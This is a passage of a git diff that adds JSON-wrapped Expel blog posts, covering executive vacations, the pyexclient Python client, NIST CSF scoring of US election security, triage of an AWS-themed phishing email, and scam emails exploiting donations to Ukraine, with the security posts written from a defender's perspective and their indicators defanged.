\u2014 in a Palimpsest or anywhere else \u2014 unless what you do aligns with what you say (and what you tell everyone else). The TL;DR is this: If I want other people on my team to take real vacations where they truly unplug and stop worrying about whatever\u2019s happening back at the office, then I\u2019ve got to do the same. There\u2019s nothing worse than the leader who wants people to do as they say and not as they do. So earlier this summer, I boarded a cruise ship in Galveston, Texas to spend a week in Cozumel, Costa Maya and Roatan with my extended family. I purposely didn\u2019t buy an international phone plan for the trip. And when someone asked if I wanted (outrageously priced) internet access on the ship \u2014 I declined. I declined! That meant no email, Slack, LinkedIn or Instagram for the entire vacation. The seven (not-so-obvious) things I learned from my time away There are plenty of things that happened on my vacation that anyone could\u2019ve predicted \u2014 all the stuff that\u2019s already been well-documented across the interwebs. Without emails and text messages and meeting invites to distract me, I focused on the people around me and got to appreciate the beauty of the ocean. I read the book Where the Crawdads Sing , practiced yoga and made a conscious decision not to worry about anything happening off the ship. I returned from my trip not just with a little more sun, but also some new perspectives \u2014 including why it\u2019s so important for execs to step away and take a real vacation. If you take real vacations, so will your team. A \u201creal vacation\u201d is one when you take multiple days away and you truly disconnect from the office. This doesn\u2019t mean you have to go anywhere exotic or fancy \u2014 staycations work too. For this particular vacation, I was gone for one week but others at Expel are committed to taking vacations that are at least two weeks. As our head of user experience, Kim Bieler, once explained to me, two weeks is a proper vacation and a game-changer for your well being. Whatever length of time you choose to take, be sure to talk about your vacations and share pictures and stories. Talking about it is another signal to your team that it\u2019s healthy and encouraged to take that break and unplug. Your team gets more opportunities to shine. While I was out, my team members stepped up and into work they don\u2019t normally do on a day-to-day basis. This was a great experience for them, both in stretching their own capabilities and determining if this new work is something they want to continue to do in the future. It also gave them more of an appreciation for and a front-row seat to what I manage on a day-to-day basis. You discover what you should\u2019ve been delegating all along. If your team can do it while you\u2019re out, they can do it when you get back. And handing the reins to your team frees you up to focus on new things. If you\u2019re scared that delegating some of the things you normally do makes you replaceable, you\u2019re right \u2014 but I prefer to think about this concept in a different way. If someone else in my org can step up and take on some of the programs and tasks I used to be responsible for, that means I\u2019ve built a great and capable team. And that\u2019s a wonderful thing for your business, your employees and you . You discover where you\u2019ve got process gaps. We\u2019ve hired lots of new Expletives lately, which means my team has only been working together for a few months. Stepping away showed me where we needed to improve our processes and better share information. For example we encourage everyone to attend at least one conference a year and we budget $2,500 per person for this experience. While I was out, my team raised some good questions on how to best use this benefit, which prompted us to write some additional guidance for our employees. Your team has more opportunities to build relationships. While I was cruising, the people on my team connected directly and more often with our exec team. I try to encourage those connections while I\u2019m in the office, but removing myself from the equation helped this happen even more naturally while I was out. You\u2019re reminded there are more ways than your way to get work done. I know it sounds obvious, but seeing work get done differently is good for so many reasons. One of my favorite parts of my job is coaching managers and helping them think differently about ways to grow and support the people on their teams. During these conversations I draw upon my experience and the techniques I\u2019ve developed over time, in the same way others on my team draw upon their own unique experiences. This means that the same conversation can have different outcomes based on the questions asked and guidance provided. Usually in these situations there isn\u2019t one right way, but many ways to get to an outcome. I enjoyed returning from vacation and learning from the coaching provided during my absence. You realize why it\u2019s so important to communicate to your team the difference between a vacation and trip. Many of us blend work and personal time when we go away. I take these kinds of \u201cblended\u201d trips when I visit California. I get the chance to spend time with my family and friends while still staying connected to the office to get work done. I don\u2019t consider these trips to be vacations, but if you look at this travel from the lens of a traditional PTO policy, it\u2019d require vacation hours. If you work at a company with a flexible time off policy, the lines start to blur so it\u2019s important to communicate in advance the type of away time you\u2019re taking. If the travel is for a trip, then fine \u2014 define your rules. If the travel is for a vacation \u2014 then be clear that you\u2019ll be disconnecting in order to protect your time away. Moral of the story: If you come work at Expel, we want you to take a vacation. For realsies. And if you choose not to come work with us, I hope I\u2019ve at least encouraged you to spend a few days fully disconnected. Do it for your own sanity and the development of your team. Now \u2026 off to get my Vinyasa on." +} \ No newline at end of file diff --git a/announcing-open-source-python-client-pyexclient-for.json b/announcing-open-source-python-client-pyexclient-for.json new file mode 100644 index 0000000000000000000000000000000000000000..4509cce0e318e614afa72fd2ced6247435d016aa --- /dev/null +++ b/announcing-open-source-python-client-pyexclient-for.json @@ -0,0 +1,6 @@ +{ + "title": "Announcing Open Source python client (pyexclient) for ...", + "url": "https://expel.com/blog/open-source-python-client-pyexclient-expel-workbench/", + "date": "Oct 27, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Announcing Open Source python client (pyexclient) for Expel Workbench Engineering \u00b7 2 MIN READ \u00b7 EVAN REICHARD, DAN WHALEN, MATT BLASIUS, PETER SILBERMAN, ROGER STUDNER, SHAMUS FIELD AND WES WU \u00b7 OCT 27, 2020 \u00b7 TAGS: Company news / MDR / Tech tools At Expel, we believe that human time is precious, and should be spent only on the tasks that humans are better at than machines \u2013 making decisions and building relationships. For the rest of the work, it\u2019s technology to the rescue. We\u2019ve built our platform, Expel Workbench\u2122, to provide an environment where our analysts can focus on high-quality decision making. In order to do this, we knew we needed the platform to be like fly paper for inventors \u2013 good ideas should be easy to experiment with and get into production. Everything you can do in our platform has a discoverable ( Open API FTW!), standard compliant ( JSON API anyone?) application-programming interface (API) behind it. If you can click it in the user interface (UI), you can automate it with client code. Internally at Expel, we\u2019ve been taking advantage of our APIs from the very beginning, but we\u2019ve always hoped to see customers do the same. Introducing pyexclient Today we\u2019re announcing the release of pyexclient , a python client for the Expel Workbench. We\u2019ve built on our learnings over the past few years and have beefed it up with documentation and lots of examples. With the release of pyexclient we\u2019re including: Snippets : we\u2019re releasing 25+ code snippets that give, in a few lines each, examples of how to accomplish a specific task. Want to create an investigation or update remediation actions? We\u2019ve got you. Scripts : In addition to the snippets, we\u2019re releasing some fully featured scripts that contain larger use cases. The three we\u2019re releasing today are: Data Export via CSV : Want to manipulate alert data in your favorite business intelligence (BI) analytics tool? This script provides an example of how to export alert data and fields as a CSV over a specified time range. Poll for new Incident : Want to build automation that runs when bad things are detected? This script provides an example that polls the API for new incidents. It also allows for filtering on keywords. Sync with JIRA : Want to expose artifacts from decisions our analysts make in Expel Workbench to your internal case management system? This script provides an example of syncing Expel activities that require customer action to a Jira project. This includes: Investigations assigned to the customer Investigative actions assigned to the customer Remediation actions assigned to the customer Comments added to an investigation Notebook : Want to see what change point analysis or off-hours alerting looks like in your environment? We\u2019ve got you. We\u2019re releasing a notebook that implements the following: ipywidget to Auth to Expel Workbench (feel free to re-use this!) Overview of alerts with some basic stats like number of alerts, percentage done without customer involvement and off-hours alerting (you can configure timezone and working hours) Heatmap of alert arrival times Time-to-action by severity w/ bar chart Change point analysis for Expel Alert time series! Here\u2019s a screenshot of change point analysis available in the notebook: Example alert time series w/ change points As we\u2019ve been working with our customers to protect and build out their cloud environments, we\u2019ve been impressed with the raw power that can be achieved with composing APIs and configurable components. Work that used to require a huge team to customize enterprise software is now just a script away. We\u2019re really excited to get this client in the hands of our customers and partners, and see what innovative ways they leverage the information available in Expel Workbench. Interested? We hope so! Getting started is as easy as \u201cpip install pyexclient\u201d. Head over to our pyexclient documentation page for more details." +} \ No newline at end of file diff --git a/applying-the-nist-csf-to-u-s-election-security-expel.json b/applying-the-nist-csf-to-u-s-election-security-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..5770369237e3a4fe554df7bdd4a822e07e152603 --- /dev/null +++ b/applying-the-nist-csf-to-u-s-election-security-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Applying the NIST CSF to U.S. election security - Expel", + "url": "https://expel.com/blog/applying-nist-csf-to-election-security/", + "date": "Sep 24, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Applying the NIST CSF to U.S. election security Security operations \u00b7 10 MIN READ \u00b7 BRUCE POTTER \u00b7 SEP 24, 2019 \u00b7 TAGS: Framework / Managed security / NIST / Planning / Vulnerability If you\u2019ve worked in security for any length of time, chances are good that you\u2019ve heard of the NIST Cyber Security Framework (CSF) . It\u2019s a useful tool for helping orgs increase their overall resilience and response to cyber threats. I\u2019ve personally used the CSF to guide cybersecurity activities in orgs of all sizes, ranging from startups and local governments to Fortune 500 companies. Even well-known tech brands like Amazon and Microsoft use the CSF to understand where they are and where they want to be with respect to cyber risk. Given the utility of the CSF, I\u2019d argue that it\u2019s not only useful for corporations \u2014 it\u2019s helpful for guiding security activities around processes like our national elections. As we march toward November 2020, there\u2019s continued dialogue around how to secure our democracy. That\u2019s because our election systems have been under attack by various adversaries ever since the United States was formed. Over the last few years, though, these attacks have come into sharp focus but the collective response to those attacks hasn\u2019t. Is election security an area where the CSF could lend some clarity to the \u201cas is\u201d and \u201cto be\u201d of the U.S. election infrastructure? I vote yes. (Pun fully intended.) The 3 challenges for state and local election operations Most of the mechanics of our elections process \u2014 like setting up ballot boxes or electronic voting machines, staffing the polls and recording and reporting votes \u2014 is managed at the state and local government level. So for the purpose of this CSF exercise, I\u2019ll focus on assessing state and local election operations at a high level. The three biggest challenges that these orgs face when it comes to election security are: Lack of standardization: Applying the CSF to election security isn\u2019t easy for many reasons \u2014 one of the biggest being the fact that there\u2019s no single organization that\u2019s in charge of U.S. elections. Unlike performing a CSF assessment on a bank or a car company, the election system isn\u2019t a monolithic organization with one executive team and one board of directors. Our election systems are governed (and funded) by various U.S., state and local laws and operated by thousands of local agencies and organizations around the country. This diversity in oversight means that any specific finding or recommendation made by any of those entities would need to be implemented by those thousands of organizations \u2014 all with varying degrees of cybersecurity knowledge and budgets. No small task. Voting infrastructure: The next challenge is the infrastructure itself. Localities run elections differently \u2014 there is no \u201cone size fits all\u201d approach that\u2019s taken by every single city, county and town throughout our country. Some use paper ballots at the voting booth, some go electronic only and some use both. Some have voter registration rolls stored on modern, cloud-based systems while others still use mainframes. Some have money for technology and security improvements but many don\u2019t. Think about running a penetration test on hundreds of different systems that have a common function but no common architecture. How would you develop recommendations after that exercise? Training for election volunteers: Lastly, many state and local governments provide training for the volunteers who show up to help you cast your vote \u2014 but just like the overall elections system, there\u2019s no standardization here. That means the election security training happening in your town might be vastly different than the depth of training happening a few towns over. Is this a hard problem? Yep. Is it unsolvable? Nope. Let\u2019s walk down the path of the CSF and see how it could apply to an important part of the election supply chain: state and local governments. U.S. Elections \u2013 Identify Looking at the NIST CSF , the first functional area is Identify. In Identify you\u2019ve got categories that deal with taking inventory of hardware and software systems, cybersecurity governance, cyber risk management and supply chain risks. Unsurprisingly, all these categories apply to securing election systems (I\u2019m hoping to quickly sway those who think election security begins at the election booth \u2014 it doesn\u2019t). Hardware and software inventories are historically complicated even for the big, seemingly tech-savvy enterprises. It\u2019s the first CSF control and arguably one of the hardest to do right, because understanding what you own and what you\u2019re running is a herculean task in organizations larger than a few dozen people. When you think of the scale of modern election systems, you might think the same is true in that case. But one thing local election boards do very well is hardware inventory. Understanding what voting systems they have and where they physically are at any given moment has been a core part of election security for as long as we\u2019ve been doing secret ballots. So while there may not be a unified hardware inventory method, there\u2019s still a concrete inventory that\u2019s well controlled. For those playing along with our NIST self-scoring tool (yeah, we have one of those and it\u2019s really easy to use \u2014 grab your own copy of the NIST CSF scoring tool here ) that\u2019s probably a 3 on the verge of a 4. Software is a different animal. Election voter rolls are run on all kinds of different systems and likely the software that runs those systems is not well inventoried (at least in many cases). Also, electronic voting systems are often a black box, so while the vendor that built the system may know what\u2019s running on those machines, the local elections boards probably doesn\u2019t. Thanks to researchers at organizations like the DEF CON Voting Village , the public now has a better inventory of what\u2019s on our voting machines. But even if the public has greater visibility into what\u2019s on the machines, that doesn\u2019t translate into election boards taking better inventory of the software on their systems. Let\u2019s score this area a 2. Another category in Identify is vendor and supply chain management. As a friend of mine says, government contracting is the land of LCTA \u2014 \u201clowest cost, technically acceptable.\u201d This applies to everything from traffic light controllers to law enforcement communication networks to voting machines. It\u2019ll come as no surprise that when you go the LCTA route, security may not be something that\u2019s a priority (if it\u2019s a consideration at all). While voting machines and voter roll systems are well regulated from a procurement perspective, there are wildly varying levels of due diligence done on the supply chain from a cyber risk perspective. Look at the state of Georgia, for example \u2014 officials purchased a voting system with known security vulnerabilities because the procurement was too far down the road and there were no perceived viable alternatives. In a conventional enterprise, these sorts of vulnerabilities would have stopped the procurement process cold. But in the relatively small world of government election systems, the transaction happened without a blink of an eye. I\u2019m going to rate that a 2, but trending towards a 1. U.S. Elections \u2013 Protect Next up in the NIST CSF is the Protect functional area. This part deals explicitly with security controls that are designed to protect an organization from a successful attack by an adversary. Encryption and data protection, identity and access management, training and awareness and how you operate the system are all part of Protect. Again, the level of sophistication of these categories varies depending on your locality. Let\u2019s talk about elections and encryption. The biggest forcing function for encryption with elections is the voter rolls and associated personal data. Upcoming laws like the California Consumer Privacy Act (CCPA) will likely force officials to create a regulatory framework that requires encryption for voter rolls. And depending on how broad the definitions are in laws like the CCPA, officials might need to encrypt the vote itself as well since it\u2019s arguably one of the most personal pieces of information someone gives away. Encrypting it makes perfect sense. We don\u2019t have concrete evidence of how much data is or is not encrypted currently in modern voting systems, so for now we\u2019ll have to label this as \u201cunknown\u201d in our NIST self-scoring tool. Lastly, Protect deals with conventional IT security controls such as change management, vulnerability management and auditing. The quality (or lack thereof) at the local level impacts the assurance of voter registration rolls as well as vote tallying and results communication processes. At the state and local level, these controls are managed by a patchwork of local officials, contractors and vendors. While orgs such as the National Association of State Legislatures have guidelines on how to secure these systems, these guidelines are voluntary and compliance varies from state to state. Looking at these controls, we could score them a solid 2 with a few states trending toward a 3. U.S. Elections \u2013 Detect The Detect functional area of the NIST CSF is the sweet spot when it comes to cybersecurity operations. This is where the bad guys are caught doing bad things. Getting a good score in Detect typically means that an org has good security signals being generated by various security tech. From there, analytical technology and humans working in a security operations center are responsible for identifying malicious activity and notifying the appropriate parties. The question here is what state and local governments have to do when it comes to: Security technology installed on endpoints and networks Security signal generated by these technologies Aggregation and analysis capabilities SOC analysts and escalation paths The distinction between what\u2019s required for the overall voting ecosystem (that includes voter registration systems and vote reporting systems) versus what\u2019s required to secure just the voting machines is striking. While voter registration and vote reporting systems are essentially enterprise systems that can have commodity security technology installed for detection purposes, electronic voting systems are basically embedded systems. They have specialized hardware and software that requires vendor interaction and specialized processes to update. Plus, voting systems are offline for most of their lives and are generally not connected to a network even when they\u2019re in use. Getting real-time telemetry off of them with software that most other security and analytic systems can understand is highly unlikely (and may put the system in more danger versus less). So for many of the Detect subcategories, scores will be pulled down due to the nature of offline voting systems in general. Some of the slack has been picked up by organizations like CYBERCOM . During the 2018 midterm elections (and to some extent in the 2016 elections as well) CYBERCOM monitored it\u2019s SIGINT assets as well as worked with various public and private sector entities to monitor election night activities for bad actors. This point-in-time monitoring is useful for detecting threat actors that may be attempting to interfere with the voting itself, but doesn\u2019t necessarily address attacks against other parts of the ecosystem. So for subcategories like Detect \u2013 Continuous Monitoring 1: \u201cThe network is monitored to detect potential cybersecurity events,\u201d most states would score a 2. U.S. Elections \u2013 Respond The Response Functional Area is a part of the NIST CSF many of us hope to never get to. If you\u2019re responding to an incident, then a bad thing already happened and you\u2019ve got to deal with it. The reality for any enterprise is that you\u2019ll eventually have to respond to security incidents. For election systems, we know from public reports that they\u2019ve been under attack for years. And some of these attacks have been successful, unfortunately. We should expect future elections to have similar issues. The good news is that because of past events, we see lots more coordination between various stakeholders than we\u2019ve ever seen before. The federal civil and military agencies are actively communicating with state and local authorities. So for RS.CO-3 (\u201cInformation is shared consistent with response plan\u201d) and RS.CO-4 (\u201cCoordination with stakeholders occurs consistent with response plan\u201d), scores are probably at least a solid 3 with some localities trending toward a 4. But how good is each plan itself (RS.RP-1)? That likely varies dramatically based on how far down into the process you are. While states have response plans at a strategic level, once you get to the local precincts, IR processes for local cyberattacks start to disappear. The saving grace is that mechanically poll workers are looking for anything out of the ordinary and run their local precincts according to a common set of procedures. So while there\u2019s no plan per se at that level, there are compensating controls that somewhat act as a plan. Score? I\u2019ll give them a 2, trending towards 3. And how well do we understand the impact (RS.AN-2)? That\u2019s been a matter of national debate for the last several years. Regardless of the facts around specific incidents, it\u2019s almost impossible for outsiders to find truth due to ideological and partisan differences. The current mechanisms for discovering and communicating the impact of cyber incidents is unfortunately woefully inadequate, resulting in a score of 1. U.S. Elections \u2013 Recover Finally, we get to the shortest Functional Area of the CSF: Recover. Once all is said and done, how well do you get back to normal operations? How well do you handle the public relations aspect to deal with the event that occurred? And are you able to refine your recovery activities based on what you learned from the last incident? Much like Respond, past events help drive improvements in this functional area. States have practices on recovery operations now and are able to (in some cases) restore services in a timely and accurate way. There are plenty of situations in which data is still lost \u2014 it takes diligence and attention to get recovery operations to be smooth and easy to execute. Score on recovery planning? I\u2019ll give this area a 2. Public relations is a large part of recovery (RC.CO-1 and 2). Again, like Response, recovery public relations relating to the election system isn\u2019t like public relations for a normal enterprise. The country is polarized and simply saying \u201cEverything is back to normal!\u201d may not be enough to satisfy most voters. Transparency is required and that isn\u2019t a strong trait of current election recovery operations. We\u2019ll get there \u2026 but for now, we\u2019re still at a 2. Next steps This was a quick, back-of-the-napkin attempt to apply the CSF to U.S. elections. Certainly we\u2019d benefit from a detailed analysis \u2014 using the CSF as the driving framework \u2014 of election systems in all 50 states. Shining a bright light on what\u2019s working and what needs help in our election systems would assist in driving funding decisions at all levels of our democracy. With that kind of common assessment, the public could make apples-to-apples comparisons between different systems and architectures in different states. We\u2019d be able to monitor change over time and measure the progress being made by those responsible for the integrity of our elections. And over time, the public would put more trust in our election system. Who would do this and where would the funding come from? That\u2019s a question that a blog post can\u2019t answer. However, I hope that what this post does provide is evidence that the NIST CSF offers value in systems of all shapes and sizes, including the national election systems. Security for the broader election supply chain That said, remember that local agencies and organizations that are leading these election operations are only part of the election security supply chain. Many people\u2019s perceptions of the election process go something like this: They go vote at their local polling place, the magic happens and results show up on their nightly news a couple hours later. But the system is much larger than that \u2014 elections are about far more than the voting machine. Consider voter registration efforts and election rolls, the campaigns and special interest groups that disseminate information about candidates and issues and the reporting and validation of the results. If you consider all those distinct parts of the supply chain, there are plenty of opportunities for attack and the adversary can be lurking almost anywhere, whether that\u2019s at a polling place or behind a Twitter account. While state and local orgs play a role in a larger effort to protect our national elections, a NIST CSF-style assessment for all 50 states would be a fantastic step forward in making our future elections more secure." +} \ No newline at end of file diff --git a/attack-trend-alert-aws-themed-credential-phishing-technique.json b/attack-trend-alert-aws-themed-credential-phishing-technique.json new file mode 100644 index 0000000000000000000000000000000000000000..7d9e0d7ee824ab33d88ba8b63d1c1ce1e276a7a5 --- /dev/null +++ b/attack-trend-alert-aws-themed-credential-phishing-technique.json @@ -0,0 +1,6 @@ +{ + "title": "Attack trend alert: AWS-themed credential phishing technique", + "url": "https://expel.com/blog/attack-trend-alert-aws-themed-credential-phishing-technique/", + "date": "Feb 1, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Attack trend alert: AWS-themed credential phishing technique Security operations \u00b7 4 MIN READ \u00b7 SIMON WONG AND EMILY HUDSON \u00b7 FEB 1, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools The Expel Phishing team spotted something \u2026fishy\u2026 recently. We came across a less common but well crafted Amazon Web Services (AWS)-themed phishing email that targets AWS login credentials. These emails have been reported in the past by security practitioners outside of Expel, but this is the first time our security operations center (SOC) encountered this technique. Now that we\u2019ve seen this tactic in the wild, we wanted to share what we learned about this attack and how our SOC analysts triage malicious emails here at Expel. What happened Expel\u2019s Phishing team reviews hundreds of emails a day and thousands of emails on a weekly basis; the vast majority of malicious emails we encounter are credential phishing attacks that are Microsoft themed. Why are they often Microsoft themed? We think it\u2019s because Microsoft and Google have dominant market share and both tech giants have highly reputable brands. Their cloud platforms and offerings are reliable cloud infrastructures, which cover most businesses\u2019 needs \u2013 like email, communications, and productivity applications. So this attack was interesting to us. Similar to Microsoft and Google, AWS is a popular cloud platform. If attackers were to obtain AWS credentials to an organization\u2019s cloud infrastructure, this can pose an immediate risk to their environment. On January 26, 2022, our customer\u2019s user submitted a suspicious email for review. We picked it up and immediately turned the email into an investigation based on some highly suspicious indicators (we\u2019ll dive into those below) that were surfaced to our analyst by one of our bots, Ruxie\u2122 . Based on these leads, we decided to dig into the submitted email for a closer look. How we triaged The way we triage emails here at Expel can be different from other managed security service providers. We use our platform, the Expel Workbench\u2122 , to ingest user submitted emails. From there, based on detections and rules created by our team, the Expel Workbench gives context for why the email is suspicious. This context provides decision support for our analysts as they review the email. That way the analyst can focus on applying what we call OSCAR (orient, strategize, collect evidence, analyze, and report), and perform analysis with decision support from our bots. We walked you through how Expel analysts use OSCAR in a previous post here . Here\u2019s what we can capture from our initial lead by applying OSCAR. By orienting , we notice that Ruxie\u2122 surfaced a suspicious link that isn\u2019t related to Amazon. And within the screenshot we noticed some poor grammar \u2013 there\u2019s no space in between \u201caccount\u201d and \u201crequires.\u201d We\u2019ve also noticed these bad actors are always cordial by making use of words like \u201ckindly.\u201d The image below is a screenshot of the suspicious email. Suspicious email submitted to Expel Phishing Let\u2019s strategize next! There are two common phishing tactics we see when it comes to phishing. One is suspicious hyperlinks and the other is file attachments. In this case, Ruxie informed us that there\u2019s no attachment. But there\u2019s a suspicious hyperlink that needs to be reviewed.The image below shows the suspicious link surfaced by Ruxie in the Expel Workbench. Expel Workbench initial alert Next step: let\u2019s collect evidence. Wow, these bots are really helping us out here! Without the need to download the email file and open it in an email client for analysis, our bots do all the heavy lifting for us. Here Ruxie\u2122 surfaces the URL, recognizes that there is a partial base64 string which looks to be an email address, and sanitizes that email address. Awesome! Ruxie actions in the Expel Workbench In a previous post , we mentioned how Expel managed phishing uses VMRay to analyze phishing emails. But not everyone has access to an advanced sandbox. Can you still analyze malicious emails? Absolutely! We\u2019ll show you how to do this by using free tools like a simple web browser sandbox and the built in developer tools, which is one of our favorite methods of analysis. We recommend using Browserling , as this provides you with a safe environment to analyze suspicious hyperlinks. We\u2019ll be using Mozilla and it\u2019s developer tools as the web browser in this example. Follow these steps to access the developer tools: Navigate to the malicious domain. Let the landing page load. Note that this page is convincing if you\u2019re not careful, since the threat actor has cloned the page. Fake AWS sign-in page Enter the faulty credentials: myuser22@company.com Navigate to the browser\u2019s developer tools. Mozilla developer tools navigation Here is a side-by-side comparison of the two pages. As you can see, they\u2019ve cloned the AWS login page. If a user isn\u2019t careful in reviewing, they\u2019ll fall victim to this attack. Left: Real AWS login page. Right: Fake AWS login page There are few important HTTP methods, like \u201cGET\u201d request, you can use when you\u2019re attempting to get data from a web server. But what about when you\u2019re investigating where credentials are being stored? You\u2019ll want to follow the \u201cPOST\u201d request traffic. This HTTP method is used to send data to the web server and most commonly used for HTTP authentication with PHP. After entering phony credentials we see the \u201cPOST\u201d request is storing the credentials to the same domain. Now we can scope using this indicator as evidence to identify potential account compromises. Mozilla developer tool In addition to our awesome bots (can you tell we love our bots here at Expel?), we also have automated workflows that are built into the Expel Workbench\u2122 that can help our analysts be more efficient by reducing cognitive loading for triaging emails. By running our domain gather query we observed no evidence of traffic to the malicious credential harvesting domain, which suggests no signs of compromise! Whew! Last but not least, we can now record that there was no evidence of compromise in our findings as a part of the investigation. Ruxie analysis that displays any POST requests made to the fake AWS webpage across the customer\u2019s environment Although tech is great and can help us be more efficient at running down investigations related to credential harvesting, it\u2019s not always necessary and we can still achieve the same goal manually. The technique we just walked you through in this post can be applied to triaging any suspicious credential harvesting email. How you can keep your org safe AWS users are just as vulnerable to credential phishing attacks as Microsoft users. And if an AWS user falls victim to phishing emails and social engineering techniques, putting their credentials in the hands of an attacker, there\u2019s a chance you\u2019ll be dealing with a cloud breach. Here are a few ways you can remediate if your AWS account was compromised: Reset Root/IAM user credentials. Disable, delete, or rotate access keys. Audit permissions and user activity through the use of CloudTrail. Enable AWS multi-factor authentication on user accounts. We hope you found this post helpful! Have questions or want to learn more about how the Expel Phishing team works? Let\u2019s chat (yes \u2013 with a real human)." +} \ No newline at end of file diff --git a/attack-trend-alert-email-scams-targeting-donations-to-ukraine.json b/attack-trend-alert-email-scams-targeting-donations-to-ukraine.json new file mode 100644 index 0000000000000000000000000000000000000000..8ac01ae9b439fb5fb32d2cae81b7b93f9914ae39 --- /dev/null +++ b/attack-trend-alert-email-scams-targeting-donations-to-ukraine.json @@ -0,0 +1,6 @@ +{ + "title": "Attack trend alert: Email scams targeting donations to Ukraine", + "url": "https://expel.com/blog/attack-trend-alert-email-scams-targeting-donations-to-ukraine/", + "date": "Mar 24, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Attack trend alert: Email scams targeting donations to Ukraine Security operations \u00b7 5 MIN READ \u00b7 HIRANYA MIR, JOSE TALENO AND SIMON WONG \u00b7 MAR 24, 2022 \u00b7 TAGS: MDR / Tech tools As the Russian invasion of Ukraine continues, many people around the world are looking for opportunities to donate to Ukrainian relief efforts. For scammers, this presents an opportunity to prey on people\u2019s well-intentioned desire to help. Recently, we\u2019ve seen an increase in phishing emails masquerading as Ukrainian cryptocurrency and charitable apparel organizations. In this post, we\u2019ll show you what these emails look like and how to spot the tell-tale warning signs to ensure your donations are going to help those in need. It\u2019s both unsurprising and horrible that there are people out there trying to take advantage of the situation. We are not discouraging anyone from donating but, since there are bad actors at play, we do encourage people to verify their donations are going to a legitimate place to help those in need. Crypto scam emails If you\u2019re thinking about donating cryptocurrency to help victims in Ukraine, it\u2019s important to be aware of potential scam techniques before you hit \u201csend.\u201d Especially if you\u2019re prompted to donate via email solicitation, rather than seeking out a public wallet address associated with donation efforts. If you receive an email claiming to represent a charitable organization accepting crypto donations, there are some key clues to indicate whether it\u2019s genuine or not. The email below is a recent example of a crypto scam email: Crypto scam email Our first clue that things are amiss? The name and address listed in the \u201cFrom\u201d field. Let\u2019s zoom in a bit more\u2026 Email headers and signature field The doctor\u2019s name listed on the \u201cFrom\u201d field (Dr.Maxim Aronov), doesn\u2019t match the email address listed on the \u201cFrom\u201d field (fontbadia@). Also, the email address provided in the signature field, maximaronov40@gmail[d]com, isn\u2019t associated with the children\u2019s clinic. If we look up the email reputation for maximaronov40@gmail[d]com we can see that this address isn\u2019t linked to any social media profiles on major services like Facebook, LinkedIn, and iCloud. While this could also mean this is a new email address, it\u2019s also suspicious. Next, let\u2019s inspect the public wallet address listed in the email body. (We\u2019ve hidden the wallet address but for anyone wondering, it was an Ethereum public address.) Crypto transactions are stored on the blockchain \u2014 leaving us a nice digital footprint of transaction activity associated with a public wallet address. You can review the transaction history of a public address using block chain explorer sites like blockchain.com and Polkascan. Below is the transaction history of the public wallet address listed in the email body: Public Ethereum address transaction history What stands out? This public wallet address has recorded zero transactions. When donating crypto to Ukrainian relief efforts, be wary of public addresses with minimal transaction history and low balances. Would you buy an expensive watch from a seller on Ebay with zero transaction history? Probably a red flag, right? The same applies to crypto donations. For a comparison, the Ukraine government\u2019s (verified) Twitter account shared three cryptocurrency wallet addresses \u2014 a Bitcoin wallet address, Ethereum wallet address, and Polkadot address. Below is the transaction history for the Bitcoin public address 357a3So9CbsNfBBgFYACGvxxS6tMaDoa1P: BTC transaction history for 357a3So9CbsNfBBgFYACGvxxS6tMaDoa1P This public wallet address has recorded tens of thousands of transactions and is labeled as a \u201cUkraine Donation Address.\u201d This is a stark contrast to the transaction history of the Ethereum public wallet address listed in the email body. The bottom line? If you\u2019re thinking about donating crypto, double-check the public address and transaction history before hitting \u201csend.\u201d You can review the transaction history of a public address using block chain explorer sites like blockchain.com and Polkascan. Be wary of public addresses with minimal transaction history and low balances. Also, perform a quick Google search of the public address. If it\u2019s not linked to Ukraine crypto donation efforts, that\u2019s a tell-tale sign that something is wrong. Fake charitable apparel emails Scammers don\u2019t just target people wanting to donate. They also target people looking to \u201cshow\u201d their support. If you\u2019re thinking about buying apparel to support Ukraine, here are a couple of things to lookout for before you hit \u201cbuy it now.\u201d Here\u2019s a recent phishing email investigated by our SOC: Fake charitable apparel email Our first clue that something just doesn\u2019t feel right? The email address listed in the \u201cFrom\u201d field has no online presence according to our friends at EmailRep . Now focusing on the email body, if we were to click the \u201cClick Here to View\u201d hyperlink, that would connect our web browser to a domain hosted at u.danhramvaiqua[d]xyz. Email hyperlink For some quick context, the .xyz top-level domain has a history of domain abuse . We\u2019re in no way saying that all websites using the .xyz top-level domain lead to bad things, but used in this way \u2014 it\u2019s certainly enough to grab our analyst\u2019s attention. Let\u2019s take a look at the website reputation for u.danhramvaiqua[d]xyz. Reviewing a website\u2019s reputation is a great way to understand if a specific IP, URL, or domain name has a negative reputation or if it\u2019s been categorized as malicious. There are a number of free resources you can use. Submit the domain and review the results. It\u2019s that easy. Here are a couple of our favorites: Symantec Site Review URLVoid Talos IP and Domain reputation Webpulse Site Review classified the u.danhramvaiqua[d]xyz domain as phishing. Webpulse domain reputation results So far, we have an email address with no digital presence sending an email with a hyperlink that points to a .xyz domain that has a reputation of phishing. This is enough evidence to make the decision to either delete the email in question or forward it on to your IT team for further review. But for folks looking to go an additional step, let\u2019s take a look at what happens when we load the \u201cu.danhramvaiqua[d]xyz\u201d page in a sandbox and browse the URL as if a user visited that page. We\u2019ll use URLScan \u2014 another free online resource. URLscan provided us the effective URL (where the domain is pointing to), provided us screenshots by loading the page (which it does if the page is active), and even let us know Cloudflare issued a TLS certificate for the site on February 28, 2022. The biggest takeaway is that if a user were to click the \u201cClick Here to View\u201d hyperlink, they\u2019d be redirected to www[d]mimoprint[d]shop. URLscan results You may be asking, should I look up the website reputation for www[d]mimoprint[d]shop? Absolutely! Spoiler: It\u2019s got a bad reputation. If you\u2019re considering a donation to support victims of the crisis in Ukraine, be aware of the prevalence of scams at play to make sure your donations are actually going to help those in need. We strongly recommend using official channels to make donations and researching your options before you hit \u201csend\u201d or \u201cbuy it now.\u201d Things you can do to spot potential scam emails Before clicking on hyperlinks, hover over them and check where that URL may lead you. Report suspicious emails to your security team and avoid interacting with any unsolicited emails. Ensure your org conducts frequent security awareness training sessions and that they\u2019re adapted to current events that might be used to mislead your end-users. Make sure your org has a good security email gateway product in place for protection. Have questions about scams like these, or want to learn more about the Expel Phishing team? Reach out any time." +} \ No newline at end of file diff --git 